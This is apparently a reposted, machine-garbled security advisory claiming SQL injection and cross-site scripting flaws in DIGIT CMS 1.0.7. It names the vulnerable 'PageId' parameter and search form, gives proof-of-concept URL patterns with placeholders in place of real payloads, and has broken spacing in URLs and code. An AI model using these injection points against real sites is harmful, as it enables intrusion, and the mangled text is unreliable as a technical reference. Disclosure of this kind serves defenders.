Title: DIGIT Cms SQL Injection/XSS Multiple Vulnerability
Author: BHG Security Center
: Http://www.dig-it.co.il/
Affected Versions: [1.0.7]
Test Platform: ubuntu 11.04
Discoverer list
-Net. Edit0r (Net. edit0r [at] att [dot] net)
-G3n3Rall (Ant1_s3cur1ty [at] yahoo [dot] com)
Bytes -----------------------------------------------------------------------------------------
DIGIT Israel Cms SQL Injection/XSS Multiple Vulnerability
Bytes -----------------------------------------------------------------------------------------
Author: BHG Security Center Web: http://Black-Hg.Org Where: From Remote
---------------------------------------------------------------------------
PoC/Exploit:
~~~~~~~~~~
~ [PoC] ~ :/Website_path/Default. asp? SType = 0 & PageId = [Sqli]
~ [PoC] Http: // www.2cto.com/path/Default. asp? SType = 0 & PageId = [Sqli]
Enter In Search Box XSS Code ~
<FORM action = "Default. asp? PageId =-1 "method = POST id = searchFORM
Name = searchFORM style = "margin: 0; padding: 0">
<INPUT type = "hidden" value = "" name = "txtSEARCH">
</FORM>
~ [PoC] ~ : Http: // www.2cto.com/path/Default. asp
Note: There are vulnerabilities in the search field that you can use